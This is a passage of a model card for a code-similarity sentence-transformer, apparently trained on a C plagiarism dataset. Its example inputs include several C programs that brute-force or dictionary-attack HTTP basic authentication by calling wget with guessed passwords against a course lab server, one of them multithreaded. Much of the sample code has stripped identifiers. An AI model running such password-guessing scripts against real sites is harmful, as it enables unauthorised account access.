\ \n\t \n\t \t \n\t exitValue=system(\"diff one.html index.html\
|
229 |
+
\ > .out\" );\n\t \n fr=fopen(\".out\",\"r\");\n\t \n\t \
|
230 |
+
\ strcpy(s,\"mailx -s \\\"Testing Again\\\"\");\n\t \t \n\t strcat(s,\"\
|
231 |
+
\ < .out\");\n\t if(fgets(url,30,fr))\n\t {\n\t system(s);\n\t \
|
232 |
+
\ \n\t system(\"rm one.html\"); \n\t \n\t printf(\"\\nCheck your\
|
233 |
+
\ mail\") ; \n\t fclose(fr); \n\t }\n\t else\n\t \
|
234 |
+
\ {\n\t printf(\" changes detected\"); \n\t\t \n\t \
|
235 |
+
\ system(\"rm one.html\"); \n\t\t fclose(fr); \n\t\t }\n\t\t return 0;\
|
236 |
+
\ \n }\n \n \n \n\n\n\n"
|
237 |
+
sentences:
|
238 |
+
- "\n\n\n#define _REENTRANT\n#include <sys/time.h>\n#include <sys/types.h>\n#include\
|
239 |
+
\ <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <stdarg.h>\n#include\
|
240 |
+
\ <unistd.h>\n#include <errno.h>\n#include <ctype.h>\n#include <pthread.h>\n#include\
|
241 |
+
\ <signal.h>\n\n\n#define MAX_THREADS 1000\n#define MAX_COMBO \n#define false\
|
242 |
+
\ 0\n#define true 1\n\n\nstatic char *alphabet=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
|
243 |
+
;\nstatic char **combination=NULL;\nstatic char host[128];\n\n\npthread_mutex_t\
|
244 |
+
\ counter_lock = PTHREAD_MUTEX_INITIALIZER;\npthread_mutex_t thread_lock = PTHREAD_MUTEX_INITIALIZER;\n\
|
245 |
+
pthread_cond_t start_hacking = PTHREAD_COND_INITIALIZER;\npthread_cond_t thread_ready\
|
246 |
+
\ = PTHREAD_COND_INITIALIZER;\n\n\nstatic int attempt_count=0;\nstatic int combo_entries=0;\n\
|
247 |
+
\nstatic struct timeval ;\nstatic struct timeval stop;\nstatic int thread_ready_indicator=false;\n\
|
248 |
+
static int thread_start_indicator=false;\nstatic int thread_count=0;\n\n\ntypedef\
|
249 |
+
\ struct range\n{\n int ;\n int ;\n}range;\n\n\nvoid *client(void *arg)\n{\n\
|
250 |
+
\ \n int i=0, status=1;\n range *= (struct range*)arg;\n\n \n char local_buffer[128];\n\
|
251 |
+
\n pthread_mutex_lock(&thread_lock);\n thread_ready_indicator=true;\n\n \n\
|
252 |
+
\ pthread_cond_signal(&thread_ready);\n\n \n while(thread_start_indicator==false)\
|
253 |
+
\ pthread_cond_wait(&start_hacking, &thread_lock);\n fflush(stdout);\n pthread_mutex_unlock(&thread_lock);\n\
|
254 |
+
\n \n for(i=->; i<=-> && i<combo_entries; i++)\n {\n \n sprintf(local_buffer,\n\
|
255 |
+
\ \"wget -q -C off -o //null -O //null --http-user=%s --http-passwd=%s %s\"\
|
256 |
+
,\n \"\", combination[i], host);\n\n \n status=system(local_buffer);\n\
|
257 |
+
\ \n\n \n if(status==0)\n {\n printf(\"\\n\\nusername: \\npassword:\
|
258 |
+
\ %s\\n\\n\", combination[i]);\n fflush(stdout);\n\n \n pthread_mutex_lock(&counter_lock);\n\
|
259 |
+
\n attempt_count++;\n gettimeofday(&stop, NULL);\n\n printf(\"\
|
260 |
+
About %d attempts were , which took %ld.%ld seconds complete.\\n\",\n \
|
261 |
+
\ attempt_count, stop.tv_sec-.tv_sec, labs(stop.tv_usec-.tv_usec));\n fflush(stdout);\n\
|
262 |
+
\n pthread_mutex_unlock(&counter_lock);\n\n \n exit(EXIT_SUCCESS);\n\
|
263 |
+
\ }\n else\n {\n \n pthread_mutex_lock(&counter_lock);\n \
|
264 |
+
\ attempt_count++;\n pthread_mutex_unlock(&counter_lock);\n }\n \
|
265 |
+
\ }\n pthread_exit(NULL);\n}\n\n\nchar *getNextCombination()\n{\n \n static\
|
266 |
+
\ int i=0;\n static int j=0;\n static int k=0;\n\n static int mode=1;\n char\
|
267 |
+
\ *word;\n\n\n \n\n if(i>51)\n {\n mode++; i=0; j=0; k=0;\n }\n\n \n \
|
268 |
+
\ if(mode==1)\n {\n char *word = calloc(mode, 1);\n word[0]=alphabet[i++];\n\
|
269 |
+
\ word[1]='\\0';\n return word;\n }\n\n \n if(mode==2)\n {\n if(j>51)\n\
|
270 |
+
\ {\n i++; j=0;\n }\n\n if(i>51)\n {\n mode++;\n i=0;\
|
271 |
+
\ j=0; j=0;\n }\n else\n {\n char *word = calloc(mode, 1);\n \
|
272 |
+
\ word[0]=alphabet[i];\n word[1]=alphabet[j++];\n word[2]='\\0';\n\
|
273 |
+
\ return word;\n }\n }\n\n \n if(mode==3)\n {\n if(k>51)\n {\n\
|
274 |
+
\ j++; k=0;\n }\n\n if(j>51)\n {\n i++; j=0;\n }\n\n \
|
275 |
+
\ if(i>51)\n {\n mode++;\n i=0; j=0; j=0;\n }\n else\n\
|
276 |
+
\ {\n char *word = calloc(mode, 1);\n word[0]=alphabet[i];\n \
|
277 |
+
\ word[1]=alphabet[j];\n word[2]=alphabet[k++];\n word[3]='\\\
|
278 |
+
0';\n return word;\n }\n }\n return NULL;\n}\n\n\nint main(int argc,\
|
279 |
+
\ char **argv)\n{\n \n int wait_status=0, i=0, j=0, num_threads=0;\n int partition=0,\
|
280 |
+
\ prev_min=0, prev_max=0;\n int len=0;\n char *word; range *;\n pthread_t tid[MAX_THREADS];\n\
|
281 |
+
\ int non_alpha_detected=0;\n\n \n if(argc<3)\n {\n puts(\"Incorrect usage!\"\
|
282 |
+
);\n puts(\"./brute num_threads url\");\n exit(EXIT_FAILURE);\n }\n\n \
|
283 |
+
\ \n strcpy(host, argv[2]);\n\n \n num_threads=atoi(argv[1]);\n\n \n combination\
|
284 |
+
\ = (char **)calloc(MAX_COMBO, sizeof(char *));\n\n printf(\"Process ID for the\
|
285 |
+
\ thread is: %d\\n\", getpid());\n printf(\"Creating brute-force dictionary\
|
286 |
+
\ ... \");\n \n \n while( (word=getNextCombination())!= NULL && i<MAX_COMBO)\n\
|
287 |
+
\ {\n combination[i]=calloc(strlen(word)+1, sizeof(char));\n strcpy(combination[i++],\
|
288 |
+
\ word);\n combo_entries++;\n }\n puts(\"\");\n j=0;\n\n \n partition=combo_entries/num_threads;\n\
|
289 |
+
\n \n if(partition==0)\n {\n puts(\"Reducing the number of threads match\
|
290 |
+
\ the number of words.\");\n num_threads=combo_entries;\n partition=1;\n\
|
291 |
+
\ }\n\n \n prev_min=0;\n prev_max=partition;\n i=0;\n\n memset(&, 0, sizeof(struct\
|
292 |
+
\ timeval));\n memset(&stop, 0, sizeof(struct timeval));\n\n \n while(i<num_threads\
|
293 |
+
\ && i<MAX_THREADS)\n {\n \n =malloc(sizeof(struct range));\n ->=prev_min;\n\
|
294 |
+
\ ->=prev_max;\n\n \n pthread_mutex_lock(&thread_lock);\n thread_ready_indicator=false;\n\
|
295 |
+
\ pthread_mutex_unlock(&thread_lock);\n\n \n if(pthread_create(&tid[i++],\
|
296 |
+
\ NULL, client, (void *))!=0) puts(\"Bad thread ...\");\n\n \n pthread_mutex_lock(&thread_lock);\n\
|
297 |
+
\ while(thread_ready_indicator==false) pthread_cond_wait(&thread_ready, &thread_lock);\n\
|
298 |
+
\ pthread_mutex_unlock(&thread_lock);\n\n \n prev_min+=partition+1;\n\
|
299 |
+
\n \n if(i==num_threads)\n {\n prev_max=combo_entries;\n }\n\
|
300 |
+
\ else\n {\n prev_max+=partition+1;\n }\n }\n\n \n gettimeofday(&,\
|
301 |
+
\ NULL);\n\n \n pthread_mutex_lock(&thread_lock);\n thread_start_indicator=true;\n\
|
302 |
+
\ pthread_mutex_unlock(&thread_lock);\n\n \n pthread_cond_broadcast(&start_hacking);\n\
|
303 |
+
\n \n printf(\"Created %d threads process %d passwords\\n\", num_threads, combo_entries);\n\
|
304 |
+
\ printf(\"Attacking host: %s\\n\", host);\n fflush(stdout);\n\n \n for(i=0;\
|
305 |
+
\ i<num_threads && i<MAX_THREADS; i++) pthread_join(tid[i], NULL);\n\n gettimeofday(&stop,\
|
306 |
+
\ NULL);\n\n \n puts(\"Could not determine the password for this site.\");\n\
|
307 |
+
\ printf(\"About %d attempts were , which took %ld.%ld seconds complete.\\n\"\
|
308 |
+
,\n attempt_count, stop.tv_sec-.tv_sec, labs(stop.tv_usec-.tv_usec));\n fflush(stdout);\n\
|
309 |
+
\n \n for(i=0; i<combo_entries; i++) (combination[i]);\n (*combination);\n\n\
|
310 |
+
\ return EXIT_SUCCESS;\n}\n\n"
|
311 |
+
- "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/time.h>\n#include <strings.h>\n\
|
312 |
+
#include <ctype.h>\n\nint ()\n{\n FILE *fp; \n char *chk,[4];\n int i=1;\n\
|
313 |
+
\ while (i == 1) \n {\n \n system(\"wget -p --convert-links http://www.cs.rmit.edu./students/\"\
|
314 |
+
);\n\n system(\"mkdir first\"); \n system(\"mkdir second\"); \n\n \n system(\"\
|
315 |
+
mv www.cs.rmit.edu./images/*.* first/\");\n system(\"mv www.cs.rmit.edu./students/*.*\
|
316 |
+
\ first/\");\n\n sleep(86400); \n\n \n system(\"wget -p --convert-links http://www.cs.rmit.edu./students/\"\
|
317 |
+
);\n\n \n system(\"mv www.cs.rmit.edu./images/*.* second/\");\n system(\"mv\
|
318 |
+
\ www.cs.rmit.edu./students/*.* second/\");\n\n \n \n system(\"diff first second\
|
319 |
+
\ > imagesdifference.txt\");\n\n \n fp = fopen(\"imagesdifference.txt\",\"r\"\
|
320 |
+
);\n \n chk = fgets(, 4, fp);\n \n if (strlen() != 0)\n system(\"mailx\
|
321 |
+
\ -s \\\"Difference from WatchDog\\\" < imagesdifference.txt\");\n }\n return\
|
322 |
+
\ 0;\n}\n"
|
323 |
+
- "#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n\
|
324 |
+
\n#define MAX_SIZE 255\n\n\nint CrackPasswd(FILE *fp)\n{\n int i, cnt, flag;\n\
|
325 |
+
\ char string1[MAX_SIZE],string2[MAX_SIZE],[MAX_SIZE], passwd[MAX_SIZE];\n \
|
326 |
+
\ char fin;\n \n strcpy(string1,\"wget http://sec-crack.cs.rmit.edu./SEC/2/\"\
|
327 |
+
);\n strcpy(string2,\" --http-user= --http-passwd='\");\n strcpy(,\"\");\n\
|
328 |
+
\n while ((fin = fgetc(fp)) != EOF)\n {\n cnt = 0;\n \n for\
|
329 |
+
\ (i=0;i<MAX_SIZE;i++)\n { \n passwd[i] = '\\0';\n [i]\
|
330 |
+
\ = '\\0';\n }\n\t \n while(fin != '\\n')\n {\n\t passwd[cnt] =\
|
331 |
+
\ fin;\n\t cnt++;\n\t fin = fgetc(fp);\n } \n \n if(strlen(passwd)\
|
332 |
+
\ <= 3)\n {\n strcat(, string1);\n strcat(, string2);\n\t\
|
333 |
+
\ strcat(, passwd);\n\t strcat(, \"'\");\n\t printf(\"Sending Request as %s\\\
|
334 |
+
n\",);\n\t flag = system();\n\t \n if (flag == 0)\n\t {\n \
|
335 |
+
\ printf(\"\\nPassword is %s\\n\",passwd);\n\t return 1;\n\t }\n \n\
|
336 |
+
\t strcpy(,\"\"); \n strcpy(passwd,\"\");\n }\n }\n} \n\n\n\
|
337 |
+
int (int argc, char *argv[])\n{\n char *fname;\n FILE *fp;\n \n int ,\
|
338 |
+
\ end; \n \n = time();\n \n if (argc != 2)\n {\n fprintf(stdout,\"\
|
339 |
+
Usage : ./Dictionary <dictionary>\\n\");\n return(EXIT_FAILURE);\n }\n\
|
340 |
+
\ \n fname = argv[1];\n \n if((fp = fopen(fname, \"r\")) == NULL)\n \
|
341 |
+
\ {\n fprintf(stderr,\"Error : Failed open %s for . \\n\",fname);\n \
|
342 |
+
\ return(EXIT_FAILURE);\n }\n \n CrackPasswd(fp);\n \n end = time();\
|
343 |
+
\ \n printf(\"Time Required = %lld msec\\n\",(end-)/());\n return (EXIT_SUCCESS);\n\
|
344 |
+
\ \n}\n \n\t \n\t \t\n"
|
345 |
+
- source_sentence: "\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n\
|
346 |
+
#include<ctype.h>\n#define MAX_SIZE 255\n\n\n\nint genchkpwd(char *chararray,char\
|
347 |
+
\ *passwd)\n {\n int i,j,k,success;\n char str1[MAX_SIZE],str2[MAX_SIZE],tempstr[MAX_SIZE];\n\
|
348 |
+
\ \n \n strcpy(str1,\"wget --http-user= --http-passwd=\");\n strcpy(str2,\"\
|
349 |
+
\ http://sec-crack.cs.rmit.edu./SEC/2/\");\n strcpy(tempstr,\"\");\n\n\n\n \
|
350 |
+
\ for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n strcat(tempstr,str1);\n\
|
351 |
+
\ strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf(\"SENDING\
|
352 |
+
\ REQUEST AS %s\\n\",tempstr);\n success=system (tempstr);\n if (success==0)\n\
|
353 |
+
\ return 1;\n else\n strcpy(tempstr,\"\"); \n strcpy(passwd,\"\
|
354 |
+
\");\n } \n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n\
|
355 |
+
\ for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n\t strcat(tempstr,str1);\n\
|
356 |
+
\ strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf(\"\
|
357 |
+
SENDING REQUEST AS %s\\n\",tempstr);\n success=system (tempstr);\n \
|
358 |
+
\ if (success==0)\n return 1;\n else\n strcpy(tempstr,\"\
|
359 |
+
\"); \n \n } \n }\n\n\n\n for(i=0;i<52;i++)\n {\n \
|
360 |
+
\ passwd[0]= chararray[i];\n for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n\
|
361 |
+
\ for(k=0;k<52;k++)\n\t {\n\t passwd[2]=chararray[k];\n\t strcat(tempstr,str1);\n\
|
362 |
+
\ strcat(tempstr,passwd);\n strcat(tempstr,str2);\n \
|
363 |
+
\ printf(\"SENDING REQUEST AS %s\\n\",tempstr);\n success=system\
|
364 |
+
\ (tempstr);\n if (success==0)\n return 1;\n \
|
365 |
+
\ else\n strcpy(tempstr,\"\"); \n\t } \n } \n \
|
366 |
+
\ }\n return 1;\n } \n\nint (int argc, char *argv[])\n {\n char chararray[52],passwd[3];\n\
|
367 |
+
\ int i,success;\n char ch='a';\n\n\n \n int , end; \n \
|
368 |
+
\ = time();\t \n\n for (i=0;i<3;i++)\n {\n passwd[i]='\\0';\n\
|
369 |
+
\ } \n\n\n\n for (i=0;i<26;i++)\n {\n chararray[i]= ch;\n\
|
370 |
+
\t ch++;\n }\n ch='A'; \n for (i=26;i<52;i++)\n {\n \
|
371 |
+
\ chararray[i]= ch;\n\t ch++;\n }\n\n\n\n success=genchkpwd(chararray,passwd);\n\
|
372 |
+
\ printf(\"\\nPassword is %s\\n\",passwd); \n getpid();\n end =\
|
373 |
+
\ time(); \n printf(\"Time required = %lld msec\\n\",(end-)/());\n return\
|
374 |
+
\ (EXIT_SUCCESS);\n }\n \n\t \n\t \t\n"
|
375 |
+
sentences:
|
376 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<ctype.h>\n\
|
377 |
+
#include<time.h>\n\nint ()\n{\n\n int m,n,o,i;\n char URL[255];\n char v[3];\n\
|
378 |
+
\ char temp1[100];\nchar temp2[100];\nchar temp3[250];\nchar [53]={'a','A','b','B','c','C','d','D','e','E','f','F','g','G','h','H','i','I','j','J','k','K','l','L','m','M','n','N','o','O','p','P','q','Q','r','R','s','S','t','T','u','U','v','V','w','W','x','X','y','Y','z','Z'};\n\
|
379 |
+
time_t u1,u2;\n\n (void) time(&u1); \n strcpy(temp1,\"wget --http-user= --http-passwd=\"\
|
380 |
+
);\n strcpy(temp2,\" http://sec-crack.cs.rmit.edu./SEC/2/index.php\");\n \n for(m=0;m<=51;m++)\n\
|
381 |
+
\ {\n v[0]=[m]; \n v[1]='\\0';\n v[2]='\\0';\n strcpy(URL,v); \n printf(\"\
|
382 |
+
\\nTesting with password %s\\n\",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n\
|
383 |
+
\ strcat(temp3,temp2);\n printf(\"\\nSending the %s\\n\",temp3);\n i=system(temp3);\
|
384 |
+
\ \n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf(\"\\n The password\
|
385 |
+
\ is %s\\n\",URL);\n\t printf(\"\\n\\nThe time_var taken crack the password is\
|
386 |
+
\ %d second\\n\\n\",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\
|
387 |
+
\tstrcpy(temp3,\"\");\n\t}\n for(n=0;n<=51;n++)\n {\n v[0]=[m]; \n v[1]=[n];\n\
|
388 |
+
\ v[2]='\\0';\n strcpy(URL,v); \n printf(\"\\nTesting with password %s\\\
|
389 |
+
n\",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n\
|
390 |
+
\ printf(\"\\nSending the %s\\n\",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n\
|
391 |
+
\ \t{\n\t (void) time(&u2); \n\t printf(\"\\n The password is %s\\n\",URL);\n\
|
392 |
+
\t printf(\"\\n\\nThe time_var taken crack the password is %d second\\n\\n\"\
|
393 |
+
,(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,\"\");\n\
|
394 |
+
\t}\n for(o=0;o<=51;o++)\n { \n v[0]=[m]; \n v[1]=[n];\n v[2]=[o];\n\
|
395 |
+
\ strcpy(URL,v); \n printf(\"\\nTesting with password %s\\n\",URL);\n strcat(temp3,temp1);\n\
|
396 |
+
\ strcat(temp3,URL);\n strcat(temp3,temp2);\n printf(\"\\nSending the %s\\\
|
397 |
+
n\",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2);\
|
398 |
+
\ \n\t printf(\"\\n The password is %s\\n\",URL);\n\t printf(\"\\n\\nThe time_var\
|
399 |
+
\ taken crack the password is %d second\\n\\n\",(int)(u2-u1));\n \t exit(0);\n\
|
400 |
+
\ \t} \n\telse\n\t{\n\tstrcpy(temp3,\"\");\n\t}\n \n \n }\n }\n } \n\
|
401 |
+
\ \n} \n"
|
402 |
+
- "\n\n#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\
|
403 |
+
#include <sys/time.h>\n#include<string.h>\nint ()\n{\nchar a[100],c[100],c1[100],c2[100],m[50];\n\
|
404 |
+
char b[53]=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n\nint i,j,k,count=0;\n\
|
405 |
+
int total_time,start_time,end_time;\nstart_time = time();\n\n\nfor(i=0;i<52;i++)\n\
|
406 |
+
{\n\t\n\tm[0]=b[i];\n\tm[1]='\\0';\n\tstrcpy(c,m);\n\tprintf(\"%s \\n\",c);\n\t\
|
407 |
+
for(j=0;j<52;j++)\n\t{\n\tm[0]=b[j];\n\tm[1]='\\0';\n\tstrcpy(c1,c);\n\tstrcat(c1,m);\n\
|
408 |
+
\tprintf(\"%s \\n\",c1);\n\tfor(k=0;k<52;k++)\n\t{\n\t\tcount++;\n\t\tprintf(\"\
|
409 |
+
ATTEMPT :%d\\n\",count);\n\t\t\n\t\tm[0]=b[k];\n\t\tm[1]='\\0';\n\t\tstrcpy(c2,c1);\n\
|
410 |
+
\t\tstrcat(c2,m);\n\nstrcpy(a,\"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php\
|
411 |
+
\ --http-user= --http-passwd=\");\n\n\t\tstrcat(a,c2);\t\t\n\t\tif(system(a)==0)\n\
|
412 |
+
\t\t{\n\t\tprintf(\"Congratulations!!!!BruteForce Attack Successful\\n\");\n\t\
|
413 |
+
\tprintf(\"***********************************************\\n\");\n\t\tprintf(\"\
|
414 |
+
The Password is %s\\n\",c2);\n\t\tprintf(\"The Request sent is %s\\n\",a); \n\
|
415 |
+
\ end_time = time();\n total_time = (end_time -start_time);\n\
|
416 |
+
\ total_time /= 1000000000.0;\n printf(\"The Time\
|
417 |
+
\ Taken is : %llds\\n\",total_time);\n\t\texit(1);\n\t\t}\n\t\t\n\t\t\n\t\t\n\t\
|
418 |
+
\t\n\t}\n\n}\n}\nreturn 0;\n}\n"
|
419 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<strings.h>\n\
|
420 |
+
#include <ctype.h>\n#include <math.h>\n#include <sys/time.h>\n\nint\n()\n{\n\n\
|
421 |
+
\tint , end;\n\tFILE *fp;\n\tint i, j;\n\tchar \
|
422 |
+
\ input;\n\tchar password[30];\n\tint check;\n\
|
423 |
+
\n\tfloat total_time;\n\tint number;\n\t = time();\n\n\n\
|
424 |
+
\tif ((fp = fopen(\"words\", \"r\")) == NULL) {\n\t\tfprintf(stderr, \"Error :\
|
425 |
+
\ Failed open words for .\\n\");\n\t\treturn (EXIT_FAILURE);\n\t}\n\twhile ((input\
|
426 |
+
\ = fgetc(fp)) != EOF) {\n\t\tj = 0;\n\t\tfor (i = 0; i < 30; i++)\n\t\t\tpassword[i]\
|
427 |
+
\ = '\\0';\n\n\t\twhile(input != '\\n' ) {\n\n\t\t\tpassword[j] = input;\n\t\t\
|
428 |
+
\tj++;\n\t\t\tinput = fgetc(fp);\n\t\t\t\n\t\t\n\t\t}\n\n\n\t\tif (strlen(password)\
|
429 |
+
\ <= 3) {\n\t\t\tprintf(\"%s\\t\",password);\n\t\t\tfflush(stdout);\n\t\t\tcheck\
|
430 |
+
\ = SysCall(password);\n\t\t\tif (check == 0) {\n\t\t\t\tgetpid();\n\t\t\t\tend\
|
431 |
+
\ = time();\n\t\t\t\ttotal_time = (end - ) / 1e9;\n\t\t\t\tprintf(\"\\ntotal time_var\
|
432 |
+
\ = %f \", total_time);\n\t\t\t\tprintf(\"\\n\\nAvg getpid() time_var = %f usec\\\
|
433 |
+
n\", total_time);\n\t\t\t\tprintf(\"\\navg time_var %f / %d = %f\\n\", total_time,\
|
434 |
+
\ number, total_time / number);\n\t\t\t\texit(0);\n\t\t\t}\n\t\t}\n\n\t}\n\n\t\
|
435 |
+
return (EXIT_SUCCESS);\n}\nint\nSysCall(char *password)\n{\n\tchar \
|
436 |
+
\ url1[255], url2[255], [255];\n\tint rettype;\n\trettype = 0;\n\t\
|
437 |
+
strcpy(url1, \"wget --non-verbose --http-user= --http-passwd=\");\n\tstrcpy(url2,\
|
438 |
+
\ \" http://sec-crack.cs.rmit.edu./SEC/2/index.php\");\n\n\tstrcat(, url1);\n\t\
|
439 |
+
strcat(, password);\n\tstrcat(, url2);\n\n\trettype = system();\n\t\n\tif (rettype\
|
440 |
+
\ == 0) {\n\t\tprintf(\"Successfully retrieved password: %s\\n\", password);\n\
|
441 |
+
\t\treturn 0;\n\t}\n\tstrcpy(, \"\");\n}\n"
|
442 |
+
pipeline_tag: sentence-similarity
|
443 |
+
library_name: sentence-transformers
|
444 |
+
---
|
445 |
+
|
446 |
+
# SentenceTransformer based on microsoft/unixcoder-base-unimodal
|
447 |
+
|
448 |
+
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [microsoft/unixcoder-base-unimodal](https://huggingface.co/microsoft/unixcoder-base-unimodal). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
|
449 |
+
|
450 |
+
## Model Details
|
451 |
+
|
452 |
+
### Model Description
|
453 |
+
- **Model Type:** Sentence Transformer
|
454 |
+
- **Base model:** [microsoft/unixcoder-base-unimodal](https://huggingface.co/microsoft/unixcoder-base-unimodal) <!-- at revision c6b7b85380bf4e01309a3cf5e4f686433764d923 -->
|
455 |
+
- **Maximum Sequence Length:** 512 tokens
|
456 |
+
- **Output Dimensionality:** 768 dimensions
|
457 |
+
- **Similarity Function:** Cosine Similarity
|
458 |
+
<!-- - **Training Dataset:** Unknown -->
|
459 |
+
<!-- - **Language:** Unknown -->
|
460 |
+
<!-- - **License:** Unknown -->
|
461 |
+
|
462 |
+
### Model Sources
|
463 |
+
|
464 |
+
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
|
465 |
+
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
|
466 |
+
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
|
467 |
+
|
468 |
+
### Full Model Architecture
|
469 |
+
|
470 |
+
```
|
471 |
+
SentenceTransformer(
|
472 |
+
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
|
473 |
+
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
|
474 |
+
)
|
475 |
+
```
|
476 |
+
|
477 |
+
## Usage
|
478 |
+
|
479 |
+
### Direct Usage (Sentence Transformers)
|
480 |
+
|
481 |
+
First install the Sentence Transformers library:
|
482 |
+
|
483 |
+
```bash
|
484 |
+
pip install -U sentence-transformers
|
485 |
+
```
|
486 |
+
|
487 |
+
Then you can load this model and run inference.
|
488 |
+
```python
|
489 |
+
from sentence_transformers import SentenceTransformer
|
490 |
+
|
491 |
+
# Download from the 🤗 Hub
|
492 |
+
model = SentenceTransformer("buelfhood/SOCO-C-UniXcoder-ST-0")
|
493 |
+
# Run inference
|
494 |
+
sentences = [
|
495 |
+
'\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n#define MAX_SIZE 255\n\n\n\nint genchkpwd(char *chararray,char *passwd)\n {\n int i,j,k,success;\n char str1[MAX_SIZE],str2[MAX_SIZE],tempstr[MAX_SIZE];\n \n \n strcpy(str1,"wget --http-user= --http-passwd=");\n strcpy(str2," http://sec-crack.cs.rmit.edu./SEC/2/");\n strcpy(tempstr,"");\n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n strcat(tempstr,str1);\n strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf("SENDING REQUEST AS %s\\n",tempstr);\n success=system (tempstr);\n if (success==0)\n return 1;\n else\n strcpy(tempstr,""); \n strcpy(passwd,"");\n } \n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n\t strcat(tempstr,str1);\n strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf("SENDING REQUEST AS %s\\n",tempstr);\n success=system (tempstr);\n if (success==0)\n return 1;\n else\n strcpy(tempstr,""); \n \n } \n }\n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n for(k=0;k<52;k++)\n\t {\n\t passwd[2]=chararray[k];\n\t strcat(tempstr,str1);\n strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf("SENDING REQUEST AS %s\\n",tempstr);\n success=system (tempstr);\n if (success==0)\n return 1;\n else\n strcpy(tempstr,""); \n\t } \n } \n }\n return 1;\n } \n\nint (int argc, char *argv[])\n {\n char chararray[52],passwd[3];\n int i,success;\n char ch=\'a\';\n\n\n \n int , end; \n = time();\t \n\n for (i=0;i<3;i++)\n {\n passwd[i]=\'\\0\';\n } \n\n\n\n for (i=0;i<26;i++)\n {\n chararray[i]= ch;\n\t ch++;\n }\n ch=\'A\'; \n for (i=26;i<52;i++)\n {\n chararray[i]= ch;\n\t ch++;\n }\n\n\n\n success=genchkpwd(chararray,passwd);\n printf("\\nPassword is %s\\n",passwd); \n getpid();\n end = time(); \n printf("Time required = %lld msec\\n",(end-)/());\n return (EXIT_SUCCESS);\n }\n \n\t \n\t \t\n',
|
496 |
+
'\n\n#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <sys/time.h>\n#include<string.h>\nint ()\n{\nchar a[100],c[100],c1[100],c2[100],m[50];\nchar b[53]="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";\n\nint i,j,k,count=0;\nint total_time,start_time,end_time;\nstart_time = time();\n\n\nfor(i=0;i<52;i++)\n{\n\t\n\tm[0]=b[i];\n\tm[1]=\'\\0\';\n\tstrcpy(c,m);\n\tprintf("%s \\n",c);\n\tfor(j=0;j<52;j++)\n\t{\n\tm[0]=b[j];\n\tm[1]=\'\\0\';\n\tstrcpy(c1,c);\n\tstrcat(c1,m);\n\tprintf("%s \\n",c1);\n\tfor(k=0;k<52;k++)\n\t{\n\t\tcount++;\n\t\tprintf("ATTEMPT :%d\\n",count);\n\t\t\n\t\tm[0]=b[k];\n\t\tm[1]=\'\\0\';\n\t\tstrcpy(c2,c1);\n\t\tstrcat(c2,m);\n\nstrcpy(a,"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php --http-user= --http-passwd=");\n\n\t\tstrcat(a,c2);\t\t\n\t\tif(system(a)==0)\n\t\t{\n\t\tprintf("Congratulations!!!!BruteForce Attack Successful\\n");\n\t\tprintf("***********************************************\\n");\n\t\tprintf("The Password is %s\\n",c2);\n\t\tprintf("The Request sent is %s\\n",a); \n end_time = time();\n total_time = (end_time -start_time);\n total_time /= 1000000000.0;\n printf("The Time Taken is : %llds\\n",total_time);\n\t\texit(1);\n\t\t}\n\t\t\n\t\t\n\t\t\n\t\t\n\t}\n\n}\n}\nreturn 0;\n}\n',
|
497 |
+
